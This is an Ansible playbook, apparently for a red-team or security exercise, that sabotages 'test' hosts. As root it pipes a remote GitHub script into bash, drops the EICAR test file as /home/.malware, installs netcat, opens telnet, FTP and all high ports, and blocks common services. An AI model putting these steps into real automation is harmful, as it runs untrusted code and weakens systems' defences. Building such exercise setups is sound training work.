---

- name: ping
  hosts: test
  tasks: 

    - name: ping test
      ping: 

- name: install packages
  hosts: test
  become: true
  tasks:

    - name: welome message
      command: "wall \"Welcome, let's play a game!\""
    
    - name: shimming tools
      command: "bash -c \"curl https://raw.githubusercontent.com/pmccabe5/automate-rt/main/scripts/shim.sh | bash\""

    - name: getting file
      command: "wget -O /home/.malware https://secure.eicar.org/eicar.com"
      warn: false

    - name: update repos
      apt:
        update_cache: yes

    - name: install packages
      apt:
        name: 
          - python3
          - python3-pip
          - ufw
          - netcat
          - git
          - cowsay
        state: latest

    - name: making swsh dir
      command: mkdir /bin/swsh

    - name: cloning starwars shell
      git:
        repo: https://github.com/moloch--/swsh.git
        dest: /bin/swsh
        clone: yes

    - name: allow tcp ports
      ufw:
        rule: allow
        port: 
          - "21"     # ftp
          - "22"     # ssh
          - "23"     # telnet
        proto: tcp

    - name: allow ports udp
      ufw: 
        rule: allow
        port: 
          - "21"     # ftp
          - "22"     # ssh
          - "23"     # telnet
        proto: udp

    - name: disable ports
      ufw:
        rule: deny
        port:
          - "80"     # http
          - "88"     # kerberos
          - "110"    # pop3
          - "138"    # netbios
          - "139"    # smb
          - "389"    # ldap
          - "443"    # https
          - "445"    # smb
          - "587"    # smtp
          - "2049"   # nfs
          - "3306"   # mysql
          - "3389"   # rdp
          - "8080"   # alt http
          - "8081"   # alt http
        proto: any
          
    - name: allow high ports tcp
      ufw: 
        rule: allow
        port: 1025:65535
        proto: tcp
    
    - name: allow high ports udp
      ufw: 
        rule: allow
        port: 1025:65535
        proto: udp

    - name: enable ufw
      ufw:
        state: enabled
      


    
